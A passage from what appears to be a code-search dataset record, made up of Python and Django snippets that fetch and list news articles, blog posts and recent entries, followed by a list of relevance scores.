docid\n news = News()\n news.docid = docid\n news.title = news_title\n news.content = body\n news.tag = tag\n news.comment_num = c_num\n news.list_pic = pic\n news.abstract = intro\n news.update_time = ptime\n news.save()\n import time\n time.sleep(2)\n if news:\n result.append(news)\n else:\n print 'update news', news_title\n n = news_exits[0]\n print 'old:', n.comment_num, 'new:', c_num\n n.comment_num = c_num\n n.save()\n else:\n print 'Fetch news for tag: %s, Error' % tag.name\n\n return result", "def newsfeed(request):\n article_list = Article.objects.order_by('published_date')\n context = {'article_list': article_list}\n return render(request, 'sacms/newsfeed.html', context)", "def get_five_latest(self):\r\n selection = []\r\n sorted(self.tweets, key=lambda tweet: tweet.date, reverse=True)\r\n amount = 5\r\n if self.get_length() < 5:\r\n amount = self.get_length()\r\n for i in range(amount):\r\n selection.append(self.tweets[i])\r\n return selection", "def get_blogs(request):\n address = request.POST.get('address')\n\n results = {\n \"sub\": [],\n \"mine\": [],\n \"browse\": []\n }\n my_blogs = Blog.objects.filter(~Q(msg=\"\"), address_from=address).order_by('-time')\n for m in my_blogs:\n results['mine'].append({\n \"address_from\": m.address_from,\n \"block_index\": m.block_index,\n \"tx_id\": m.tx_id,\n \"msg\": m.msg,\n \"key\": m.key,\n \"time\": m.time\n })\n\n my_sub_ids = [s.address for s in Subscription.objects.all()]\n\n sub_blogs = Blog.objects.filter(~Q(msg=\"\"), address_from__in=my_sub_ids).order_by(\"-time\")\n for m in sub_blogs:\n results['sub'].append({\n \"address_from\": m.address_from,\n \"block_index\": m.block_index,\n \"tx_id\": m.tx_id,\n \"msg\": m.msg,\n \"key\": m.key,\n \"time\": m.time\n })\n\n browsable_blogs = {}\n browse_blogs_db = Blog.objects.filter(~Q(address_from__in=my_sub_ids)).order_by('-time')\n for m in browse_blogs_db:\n if m.address_from not in browsable_blogs:\n browsable_blogs[m.address_from] = {\n \"address_from\": m.address_from,\n \"latest_post_time\": m.time,\n \"total_posts\": 1\n }\n else:\n browsable_blogs[m.address_from]['total_posts'] += 1\n\n results['browse'] = sorted(browsable_blogs.values(), key=lambda k: k['latest_post_time'])\n\n return HttpResponse(json.dumps({\n \"status\": \"success\",\n \"data\": results\n }, default=helpers.json_custom_parser), 
content_type='application/json')", "def related_articles(self, num):\n related_articles = None\n try:\n related_articles = Article.objects.values('id', 'title', 'view_times', 'update_time', 'author').\\\n filter(tags__icontains=self.tags_list()[0]).\\\n exclude(id=self.id)[:num]\n except IndexError:\n pass\n\n if not related_articles:\n related_articles = Article.objects.values('id', 'title', 'view_times', 'update_time', 'author').\\\n filter(category=self.category).\\\n exclude(id=self.id)[:num]\n\n return related_articles", "def get_queryset(self):\n\t\treturn Post.objects.order_by('-pub_date')[:5]", "def get_recent_news_items():\n news_item_count = request.args.get('newsItemCount') or 3\n try:\n animal_news = AnimalNews.get_printable_news_items_all_animals(news_item_count)\n return jsonify(message=animal_news), 200\n except Exception as e:\n print(e)\n return jsonify(message='{}'.format(e)), 501", "def most_active_post(request, pk):\n update_posts_expiration()\n posts = Post.objects.filter(topic=pk)\n highest_likes = 0\n highest_dislikes = 0\n highest_total_count = 0\n new_total_count = 0\n post_id = 0\n for post in posts:\n\n if (post.likes_count > highest_likes):\n highest_likes = post.likes_count \n \n if (post.dislikes_count > highest_dislikes):\n highest_dislikes = post.dislikes_count \n\n new_total_count = highest_likes + highest_dislikes\n\n if (new_total_count > highest_total_count):\n post_id = post.id\n highest_total_count = new_total_count\n\n post = Post.objects.filter(id=post_id)\n \n serializer = ViewPostSerializer(post, many=True)\n return Response(serializer.data)", "def top_ten(request):\n if request.method == 'GET':\n movies = Movie.objects.filter(date_of_release__lte=datetime.date.today())\n movies = movies.order_by('-rating')[:10]\n serializer = MovieSerializer(movies, many=True)\n return Response(serializer.data)", "def list_all(request):\n\n entries = BlogEntry.objects.all()\n data = {'entries': paginate_objects(request, entries),\n 'blog_info': get_blog_info(), 'action_str': 'All Blogs Shown'}\n\n return render_to_response('blog/list_entries.html', data,\n context_instance=get_rq(request))", "def get_recent_months(self, request, count):\n query = DBSession.query(\n sa.func.year(Post.date),\n sa.func.month(Post.date), \n sa.func.count(Post.date)\n ).filter(\n Post.blog_id==self.id\n ).group_by(\n sa.func.year(Post.date), sa.func.month(Post.date)\n ).order_by(\n sa.desc(sa.func.year(Post.date)), \n sa.desc(sa.func.month(Post.date))\n )\n ret = []\n for y, m, n in query.all():\n year = Year(self, \"%04d\" % y)\n month = Month(year, \"%02d\" % m)\n month.post_count = n\n ret.append(month)\n return ret", "def get_last_posts(self):\n last_posts = []\n r = requests.get(self.target_url)\n html = BeautifulSoup(r.content, 'html.parser')\n raw_posts = html.findAll(\"div\", {\"class\": \"item\"})\n\n for post in raw_posts:\n title_element = post.find(\"a\", {\"class\": \"item-link\"})\n title = self.text(title_element)\n href = title_element['href']\n description = self.text(post.find(\"div\", {\"class\": \"item-info-container\"}))\n id_post = str(post['data-adid'])\n price = self.text(post.find(\"span\", {\"class\": \"item-price\"}))\n image_element = post.find_all(\"img\")\n image_src = image_element[0]['data-ondemand-img'] if image_element else None\n complete_href = self.crawler_url + href\n description = '\\n'.join([title, description, price, complete_href])\n last_posts.append(Post(id=id_post, href=complete_href, description=description, image=image_src))\n return 
last_posts", "def list(request):\n assert isinstance(request, HttpRequest)\n login = request.user and request.user.is_authenticated()\n article_list = get_article_list('-released_at',login)\n page_no = request.GET.get('page')\n page = _get_page(article_list, page_no, ARTICLER_LIST_PAGE_IN_COUNT )\n auth_form = AuthenticationForm(None, request.POST or None)\n return render(\n request,\n 'app/article_list.html',\n {\n 'title':'ニュース一覧',\n 'year':datetime.now().year,\n 'articles':article_list[:5],\n 'blogs':EntryView.get_entry_list('-posted_at',-1, -1 if not login else request.user.pk )[:5],\n 'contents':range(1,6),\n 'article_list':page.object_list,\n 'auth_form':auth_form,\n 'current_user':request.user,\n 'page' : page,\n 'current_page':request.path #'article_list'\n }\n )", "def home(request):\n\n posts = Post.objects.filter(published=True)\n latest = 0\n if posts:\n latest = Post.objects.latest('updated').unix_time()\n\n return render(request, 'posts/home.html', {'posts':posts, 'latest':latest})", "def home(request):\n context_dict = {}\n categories = []\n general_category = Category.objects.get_or_create(name=\"General Discussion\")[0]\n if general_category:\n categories_qs = Category.objects.exclude(slug=\"general-discussion\").annotate(num_threads=Count('thread')).order_by('-num_threads')\n top_threads = {}\n for category in chain([general_category], categories_qs):\n categories.append(category)\n top_threads[str(category.pk)] = [[thread, str(thread.post_set.count() - 1)] for thread in Thread.objects.filter(category=category, visible=True).order_by('-last_modified')[:2]]\n context_dict['categories'] = categories\n context_dict['top_threads'] = top_threads\n if request.user.is_authenticated():\n member = Member.objects.get(user=request.user)\n if member:\n context_dict['member'] = member\n return render(request, 'home.html', context_dict)\n else:\n return server_error(request)", "def get_queryset(self):\n return Post.objects.order_by('-post_date')[:5]", "def get_top_featured_entries(number=5):\n return list(Entry.published.filter(featured=True)[:number])", "def getRecommendedPosts(request, limit):\n if request.method == 'GET':\n user = request.user;\n scores = {};\n for topic in Topic.objects.filter(visits__user=user).distinct():\n\n last_visit = topic.visits.filter(user=user).order_by('-visit_date')[0].visit_date;\n\n unread_posts = topic.posts.filter(created_at__gt=last_visit)\n for post in unread_posts:\n score = 10 * post.accuracy - (timezone.now()-last_visit).total_seconds()/3600\n scores[post] = score;\n\n extraPosts = Post.objects.exclude(topic__visits__user=user).order_by('-created_at')\n sorted_scores = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\n recommended_posts = [key for key, value in sorted_scores]\n recommended_posts += extraPosts\n recommended_posts = recommended_posts[:int(limit)]\n\n TopicNestedSerializer.Meta.depth = 1\n PostNestedSerializer.Meta.depth = 1\n serializer = PostNestedSerializer(recommended_posts, many=True);\n return Response(serializer.data)", "def update_all_posts():\n for post in CURRENT_POSTS:\n update_tag(post)", "def all_blogs(request):\n\n posts = Post.objects.all()\n\n context = {\n 'posts': posts\n }\n\n return render(request, 'blog/blog.html', context)", "def articles(self):\n articles = Post.objects.live().descendant_of(self)\n articles = articles.order_by('-date')\n\n return articles", "def articles(self):\n return self.get_queryset().filter(content_type__model='article').order_by('-articles__published_at')", "def 
_inner_paginate(request, issues, template, extra_template_params):\n visible_issues = [i for i in issues if i.view_allowed]\n _optimize_draft_counts(visible_issues)\n _load_users_for_issues(visible_issues)\n params = {\n 'issues': visible_issues,\n 'limit': None,\n 'newest': None,\n 'prev': None,\n 'next': None,\n 'nexttext': '',\n 'first': '',\n 'last': '',\n }\n if extra_template_params:\n params.update(extra_template_params)\n return respond(request, template, params)", "def _inner_paginate(request, issues, template, extra_template_params):\n visible_issues = [i for i in issues if i.view_allowed]\n _optimize_draft_counts(visible_issues)\n _load_users_for_issues(visible_issues)\n params = {\n 'issues': visible_issues,\n 'limit': None,\n 'newest': None,\n 'prev': None,\n 'next': None,\n 'nexttext': '',\n 'first': '',\n 'last': '',\n }\n if extra_template_params:\n params.update(extra_template_params)\n return respond(request, template, params)", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def all_news(request):\n\n all_news = News.objects.all().order_by(\"-date_added\")\n context = {\n 'news': all_news,\n 'show_without_bag': True\n }\n return render(request, 'news/news.html', context)", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def get_posts(request):\n posts = Post.objects.order_by(\"created_date\")\n return render(request, \"blogposts.html\", {\"posts\": posts})", "def sponsored_bar():\n articles = []\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored First')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Second')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Third')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Fourth')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Fifth')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n exclude = ['Sponsored First', 'Sponsored Second', 'Sponsored Third',\n 'Sponsored Fourth', 'Sponsored Fifth']\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Article')\n .exclude(tags__text__in=exclude)\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:5 - len(articles)]])\n \"\"\"\n Enable this code (and disable the above) for sponsored articles returning\n by date (without the tag preferences)\n\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Article')\n 
.annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:5 - len(articles)]])\n \"\"\"\n\n return {'articles': articles}", "def view_latest_post(request):\n address = request.POST.get('address')\n rpc_raw = rpcRawProxy(helpers.get_rpc_url())\n\n latest_blog_post = Blog.objects.filter(address_from=address).order_by('-time')[0]\n\n blog_post = helpers.download_blg(rpc_raw, latest_blog_post.key, latest_blog_post.address_from)\n\n return HttpResponse(json.dumps({\n \"status\": \"success\",\n \"data\": blog_post\n }, default=helpers.json_custom_parser), content_type='application/json')" ]
[ "0.6630519", "0.6064325", "0.5982739", "0.5916848", "0.58361304", "0.5788325", "0.57815117", "0.5755909", "0.57152796", "0.56332666", "0.56171244", "0.5601291", "0.5582968", "0.54634035", "0.5452473", "0.53599924", "0.5354808", "0.5313329", "0.52591276", "0.522024", "0.5218829", "0.5195488", "0.51946217", "0.5189172", "0.51653963", "0.5148892", "0.5133105", "0.5123282", "0.5082277", "0.5056665", "0.5044052", "0.5043295", "0.5042931", "0.5018061", "0.5010417", "0.50023115", "0.49916583", "0.4972063", "0.49703163", "0.4968735", "0.49667653", "0.4964661", "0.49483493", "0.49469092", "0.49449593", "0.4939857", "0.49372822", "0.49285167", "0.49092993", "0.4891158", "0.48835546", "0.48812398", "0.48722607", "0.48692045", "0.4862355", "0.48576754", "0.48517412", "0.48446405", "0.48441094", "0.48408416", "0.48406458", "0.48387554", "0.48325053", "0.4825628", "0.48149976", "0.48141906", "0.4813046", "0.47965688", "0.4795931", "0.47908202", "0.4780503", "0.4774762", "0.4772929", "0.4762851", "0.47584668", "0.475171", "0.47481477", "0.47445083", "0.47357628", "0.47331628", "0.4722749", "0.47210196", "0.47066376", "0.46915907", "0.46819752", "0.46780473", "0.4673064", "0.46718848", "0.4665418", "0.46630424", "0.4658545", "0.46453267", "0.46450746", "0.46450746", "0.46435866", "0.4640652", "0.46328145", "0.46303347", "0.46271017", "0.4625891" ]
0.67686737
0
Format a Roku Channel name.
def format_channel_name(channel_number: str, channel_name: str | None = None) -> str:
    if channel_name is not None and channel_name != "":
        return f"{channel_name} ({channel_number})"
    return channel_number
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def channel_name(radio_id: int, channel_id: int) -> str:\n return f\"COMM{radio_id} Ch {channel_id}\"", "def channelName(self):\n channel_list = (\"Neutral\",\n \"BBC1\",\n \"BBC2\",\n \"ITV\",\n \"Channel 4\",\n \"Channel 5\")\n channel_name = channel_list[self.channel]\n return channel_name", "def channel_name(self) -> str:\n return self._channel_name", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def fmt(competitor_name: str) -> str:\n name = competitor_name.replace(\"_a\", r\" $\\alpha$ \")\n name = name.replace(\"_b\", r\" $\\beta$ \")\n return name", "def channel_string(self, pre=\"\", full=False):\n\n return \" \".join(pre+c.get_chanstr(full=full) for c in self.channels)", "def get_channel_name(self, channelid, isdm=False):\n\n if isdm:\n return channelid\n\n request = SimpleRequest(self.headers).request\n channel = request.grab_page('https://discordapp.com/api/%s/channels/%s' % (self.api, channelid))\n\n if channel is not None and len(channel) > 0:\n return '%s_%s' % (channelid, self.safe_name(channel['name']))\n\n else:\n error('Unable to fetch channel name from id, generating one instead.')\n return '%s_%s' % (channelid, random_str(12))", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def button_string(channel, red, blue):\n return 'CH{:s}_{:s}_{:s}'.format(channel, red, blue)", "def char_name(character_object, verbose_where=False, watch_list=None):\n watch_list = watch_list or []\n cname = character_object.name\n if character_object in watch_list:\n cname += \"{c*{n\"\n if character_object.player_ob and character_object.player_ob.db.lookingforrp:\n cname += 
\"|R+|n\"\n if not verbose_where:\n return cname\n if character_object.db.room_title:\n cname += \"{w(%s){n\" % character_object.db.room_title\n return cname", "def to_release_brach_name(self) -> str:\n return f\"release/{self.major}.{self.minor}\"", "def format_name(self) -> str:\n return self.name", "def channel_link(self, obj):\n if obj.channel is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_channel_change', args=(obj.channel.pk,)),\n obj.channel.title if obj.channel.title != '' else '[Untitled]'\n )", "def to_str(self) -> str:\n perms = (\n \"Write and Read\"\n if self.perms == \"wr\"\n else \"Read\"\n if self.perms == \"r\"\n else \"Write\"\n )\n return f\"Channel: <#{self.channelID}>\\n┗━▷ Linked to **{self.wh}** - Permissions: *{perms}*\"", "def channel_name(self, channel_name):\n self.channel_id = self.get_channel_id(channel_name)\n LOG.debug(\"Mattermost channel id: %s\", self.channel_id)", "def format_name(field_name):\r\n if field_name == \"celebration_tier\":\r\n return \"{wLargesse{n\"\r\n return \"{w%s{n\" % field_name.capitalize()", "def create_ticker_channel(self, symbol: str) -> str:", "def parse_channel(self, channel):\n return channel.split(\":\")[1:]", "async def text_channel_name_length(\n channel: Channel\n):\n return len(channel.name)", "def get_video_channel_name(self, response):\n return response.css(\"div.yt-user-info\")\\\n .extract_first(default='')", "def __str__(self: GtinFormat) -> str:\n return self.name.replace(\"_\", \"-\")", "def format_pname(player, lname=False, sparse=False):\n base = player.name.capitalize()\n if lname and not sparse:\n char = player.char_ob\n if char:\n base = char.item_data.longname or base\n if player.db.afk:\n base += \" {w(AFK){n\"\n if player.db.lookingforrp:\n base += \" {w(LRP){n\"\n if player.is_staff:\n base += \" {c(Staff){n\"\n return base", "def test_unicode_channel_name(self):\n channel_layer.send(\"\\u00a3_test\", {\"value\": \"blue\"})\n # Get just one first\n channel, message = channel_layer.receive_many([\"\\u00a3_test\"])\n self.assertEqual(channel, \"\\u00a3_test\")\n self.assertEqual(message, {\"value\": \"blue\"})", "def build_track_name(track, number = ''):\n\n name = ''\n if number:\n name += number\n name += ' - '\n name += track\n return name", "def print_name(self, name):\r\n for e in self.channels:\r\n if e.name == name:\r\n e.print()", "def __find_notification_channel_name_in_message(message):\n channel_name = [t for t in message.split() if t.startswith('[projects')]\n return channel_name[0].translate(None, '[].')", "def api_get_channel_name(channel_id, api_service):\n request = api_service.channels().list(id=channel_id, part='snippet')\n success = False\n\n response = None\n\n while not success:\n\n try:\n response = request.execute()\n success = True\n\n except ConnectionResetError:\n print(\"ConnectionResetError: let me sleep for 5 seconds, just enough time to recover...\")\n sleep(5)\n\n name = response['items'][0]['snippet']['title']\n\n return name", "def create_tickers_channel(self) -> str:", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def create_book_ticker_channel(self, symbol: str) -> str:", "async def get_project_channel_name(self, workspace: WorkspaceEntity):\n await self.client.login(os.environ['DISCORD_BOT_TOKEN'], bot=self.is_bot)\n channel_name = \"\"\n try:\n channel = await self.get_channel(workspace.project_channel_id)\n except HTTPException as 
error:\n # project channel id may result in Missing Access (code 50001)\n self.logger.critical(\n f\"discord {self.get_project_channel_name.__name__} request failed for workspace {workspace.id} and raised error: {error.text} (code {error.code})\")\n else:\n channel_name = channel.name\n\n await self.client.logout()\n return channel_name", "def create_book_tickers_channel(self) -> str:", "def cc(self, name):\n return \"\".join([n[0].upper() + n[1:] for n in name.split(\".\")])", "def set_channel(self, channel):\n self.l1.setText(\"Channel: \" + str(channel))", "def __str__(self):\n return 'Channel: {{{}}} --> {{{}}} | {} ... '.format(\n ', '.join(sorted([str(i.indi) for i in self.ist])) if self.ist else '-', \n ', '.join(sorted([str(o.indo) for o in self.ost])) if self.ost else '-', \n 'running' if self._running else 'stopped')", "async def name(self, ctx, *, name: str):\n await self.config.guild(ctx.guild).name.set(name)\n await ctx.send(\n _(\"Automatically created voicechannels will now be named ``{name}``.\").format(\n name=name\n )\n )", "def channel(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"channel\")", "def getHubName(num):\n baseNum = num % 1000\n if baseNum > 0 and baseNum < 100:\n return \"%02d\" % baseNum\n if baseNum > 200 and baseNum < 220:\n return \"%02dt\" % (baseNum - 200)\n return \"?%d?\" % baseNum", "def _group_name(cls, group=None):\n suffix = f\"{cls.__module__}.{cls.__qualname__}\"\n if group is not None:\n suffix += \"-\" + group\n\n # Wrap the suffix into SHA256 to guarantee that the length of\n # the group name is limited. Otherwise Channels will complain\n # about that the group name is wrong (actually is too long).\n suffix_sha256 = hashlib.sha256()\n suffix_sha256.update(suffix.encode(\"utf-8\"))\n\n return f\"{GraphqlWsConsumer.group_name_prefix}-{suffix_sha256.hexdigest()}\"", "def is_channel_name(name):\n return name.startswith('#') or name.startswith('&')", "def _deepvariant_channel_names(num_channels):\n # Add additional empty labels if there are more channels than expected.\n filler_labels = [\n 'channel {}'.format(i + 1)\n for i in range(len(DEEPVARIANT_CHANNEL_NAMES), num_channels)\n ]\n labels = DEEPVARIANT_CHANNEL_NAMES + filler_labels\n # Trim off any extra labels.\n return labels[0:num_channels]", "def format_color_name(string, frame_name):\n if frame_name == \"primary\":\n color = \"red\"\n else:\n color = \"green\"\n return format_color(string, color)", "async def voice_channel_name_length(\n channel: P('channel', 'Select a voice channel', channel_types = [ChannelType.guild_voice])\n):\n return len(channel.name)", "def name(self):\n return '#{}'.format(self.number)", "def generate_name(self, name):\n return \"{}/{}.{}\".format(self.name, self._layer_counter, name)", "def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname", "def name(self):\n name = self.__telegram_info.message.from_user.name\n return name[0].upper() + name[1::]", "def format_colname(name):\n colnames = [\n \"AV\",\n \"RV\",\n \"EBV\",\n \"CAV1\",\n \"CAV2\",\n \"CAV3\",\n \"CAV4\",\n \"C1\",\n \"C2\",\n \"C3\",\n \"C4\",\n \"x_o\",\n \"gamma\",\n \"bump_area\",\n \"fh2\",\n \"nhtot\",\n \"nh2\",\n \"nhi\",\n \"NH_AV\",\n \"NH_EBV\",\n ]\n plotnames = [\n \"$A(V)$\",\n \"$R(V)$\",\n \"$E(B-V)$\",\n \"$C^{A(V)}_1$\",\n \"$C^{A(V)}_2$\",\n \"$C^{A(V)}_3$\",\n \"$C^{A(V)}_4$\",\n \"$C_1$\",\n \"$C_2$\",\n \"$C_3$\",\n \"$C_4$\",\n \"$x_o$\",\n r\"$\\gamma$\",\n r\"$\\pi C^{A(V)}_3 / 2 \\gamma$\",\n \"$f(H_2)$\",\n 
\"$N(H)$\",\n \"$N(H_2)$\",\n \"$N(HI)$\",\n \"$N(H)/A(V)$\",\n \"$N(H)/E(B-V)$\",\n ]\n dic_pairs = dict(zip(colnames, plotnames))\n\n out_name = name\n if name[:3] == \"log\":\n out_name = r\"$\\log (\" + name[3:].upper() + \")$\"\n elif name in dic_pairs.keys():\n out_name = dic_pairs[name]\n\n return out_name", "def get_name(self) -> str:\n return self.message[42:74].decode().rstrip(\"\\x00\")", "def channel_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"channel_id\")", "def _name (self, incAggr = True):\n\t\taggrName = \"@%s\" % self.aggr if self.aggr and incAggr else \"\"\n\t\ttag = \".%s\" % self.tag if self.tag != \"notag\" else \"\"\n\t\treturn \"%s%s%s\" % (self.id, tag, aggrName)", "def create_mini_ticker_channel(self, symbol: str) -> str:", "def in_battle_name(self):\n if self.trainer:\n return u\"{0}'s {1}\".format(self.trainer.name, self.nickname)\n else:\n return u\"Wild {0}\".format(self.nickname)", "def format_category_name(category):\n\n category_words = category.name.rstrip().replace(',', '').replace(\"'\", '').split(\" \")\n return \"-\".join(category_words)", "def get_name() -> str:", "async def test_get_rpc_channel_name(mock_rpc_device) -> None:\n assert get_rpc_channel_name(mock_rpc_device, \"input:0\") == \"test switch_0\"\n assert get_rpc_channel_name(mock_rpc_device, \"input:3\") == \"Test name switch_3\"", "def printname(bruce):", "def format_jira(jid: str) -> str:\n jid = jid.lower().strip()\n jid = jid.split('_')[0]\n j = \"\".join(jid.split('-'))\n return j", "def rename_channels(self, new_names):\n if \"time\" in new_names:\n del new_names[new_names.index(\"time\")]\n\n new_names = [\n \"time\",\n ] + new_names\n\n self.ch_name = has_size(\n is_valid(new_names, list, list_type=str), self.ch_amount, \"unknown\"\n )", "def generate_file_name(well, channel, desc):\n \n return \"bPLATE_w\" + well + \"_\" + desc + \"_c\" + channel + \".png\"", "def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name", "def generate_colorbar_label(standard_name, units):\n return str(standard_name).replace(\"_\", \" \") + \" (\" + units + \")\"", "async def ticket_name(self, ctx, *, name: str):\n guild_settings = await self.config.guild(ctx.guild).all()\n is_admin = await is_admin_or_superior(self.bot, ctx.author) or any(\n [ur.id in guild_settings[\"supportroles\"] for ur in ctx.author.roles]\n )\n must_be_admin = not guild_settings[\"usercanname\"]\n\n if not is_admin and must_be_admin:\n await ctx.send(\"Only Administrators can rename tickets.\")\n return\n elif not is_admin:\n author = ctx.author\n author_id = author.id\n elif is_admin:\n # Since the author isn't specified, and it's an admin, we need to guess on who\n # the author is\n inverted = {}\n for author_id, tickets in guild_settings[\"created\"].items():\n for ticket in tickets:\n inverted[ticket[\"channel\"]] = author_id\n try:\n author = ctx.guild.get_member(int(inverted[ctx.channel.id]))\n if author:\n author_id = author.id\n else:\n author_id = int(inverted[ctx.channel.id])\n except KeyError:\n author = ctx.author\n author_id = author.id\n\n if str(author_id) not in guild_settings[\"created\"]:\n await ctx.send(\"You don't have any open tickets.\")\n return\n\n index = None\n\n if not guild_settings[\"created\"][str(author_id)]:\n await ctx.send(\"You don't have any open tickets.\")\n return\n elif len(guild_settings[\"created\"][str(author_id)]) == 1:\n index = 0\n else:\n for i, ticket in enumerate(guild_settings[\"created\"][str(author_id)]):\n if ticket[\"channel\"] == 
ctx.channel.id:\n index = i\n break\n\n if index is None:\n await ctx.send(\n \"You have multiple tickets open. \"\n \"Please run this command in the ticket channel you wish to edit.\"\n )\n return\n\n channel = self.bot.get_channel(guild_settings[\"created\"][str(author_id)][index][\"channel\"])\n if not channel:\n await ctx.send(\"The ticket channel has been deleted.\")\n return\n\n if len(name) > 99:\n await ctx.send(\"Channel names must be less 100 characters\")\n return\n\n try:\n await channel.edit(name=name)\n except discord.Forbidden:\n await ctx.send(\n \"The Manage Channels channel for me has been removed. \"\n \"I am unable to modify this ticket.\"\n )\n return\n\n await ctx.send(\"The ticket has been renamed.\")", "def get_nomenclature_channel_fname(czi_fname, nomenclature_file, channel_name, ext='.inr.gz'):\n # - Read NOMENCLATURE file defining naming conventions:\n n_names = get_nomenclature_name(nomenclature_file)\n return n_names[czi_fname]+\"/\", n_names[czi_fname] + \"_\" + channel_name + ext", "def name(self):\n return f\"{self._group.friendly_name} {GROUP_SUFFIX}\"", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def format_name(self) -> str:\n decl = self.declaration\n name, _ = decl.split(\"(\", 1)\n return name", "def deleteChannel(channelName):\n renameTo = ''.join([char if char.isnumeric() else '_' for char in str(datetime.utcnow())])\n renameChannel(channelName, renameTo)\n\n post(f\"https://slack.com/api/conversations.archive?{parse.urlencode({'channel' : channelNameToID(renameTo)})}\", headers=slackHeader(current_user.slackUserToken))\n return \"Zulip deleted a Slack channel\"", "def setChannelNames(self, n1, n2):\n\t\tfor i, val in enumerate(self.headervals):\n\t\t\ts = val[0]\n\t\t\ts = s.replace(\"%ch1%\", n1)\n\t\t\ts = s.replace(\"%ch2%\", n2)\n\t\t\tself.headervals[i][0] = s\n\t\t\tself.SetStringItem(i, 0, s)", "def get_rep_name(self, name):\n return \"r{0}\".format(name)", "def format_name(self) -> str:\n decl = self.declaration\n name, _, _ = decl.partition(\"(\")\n return name", "def print_name(name):\r\n\r\n\r\n return name + \"-apple\"", "def channelURL(self):\n bytes = self.radioConfig.channel_settings.SerializeToString()\n s = base64.urlsafe_b64encode(bytes).decode('ascii')\n return f\"https://www.meshtastic.org/c/#{s}\"", "def create_mini_tickers_channel(self) -> str:", "def names(self, channel, *args, **kwargs):\n pass", "def channels(message):\n for channel in message._client.channels:\n if 'is_member' in channel:\n message.reply(\"{} ({})\".format(channel['name'], channel['id']))\n elif 'is_im' in channel:\n #print(channel)\n friendlyname = channel['user']\n try:\n friendlyname = channel['user'][\"name\"]\n except (KeyError, AttributeError):\n pass\n message.reply(\"User channel: {} ({})\".format(friendlyname,\n channel['id']))" ]
